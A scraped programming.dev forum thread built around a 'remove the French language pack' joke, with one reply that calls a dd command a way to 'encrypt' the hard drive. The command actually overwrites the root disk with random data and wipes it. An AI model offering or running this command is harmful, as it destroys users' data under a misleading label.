𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟 to Programmer [email protected] • 2 years agoHow to remove the French language packprogramming.devimagemessage-square25fedilinkarrow-up1465arrow-down19
arrow-up1456arrow-down1imageHow to remove the French language packprogramming.dev𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟 to Programmer [email protected] • 2 years agomessage-square25fedilink
minus-squareinterolivarylinkfedilink4•2 years agoYou can also use dd to encrypt your hard drive using a randomized one-time pad: dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k
You can also use
dd
to encrypt your hard drive using a randomized one-time pad:dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k